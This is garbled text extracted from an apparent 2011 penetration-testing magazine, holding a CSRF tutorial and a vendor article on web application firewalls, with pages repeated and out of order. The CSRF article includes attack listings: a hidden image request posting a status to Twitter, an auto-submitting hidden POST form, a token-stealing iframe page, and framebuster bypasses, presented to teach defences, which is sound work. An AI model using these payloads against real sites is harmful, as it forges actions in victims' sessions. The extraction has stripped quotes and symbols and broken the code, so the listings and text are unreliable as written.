own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
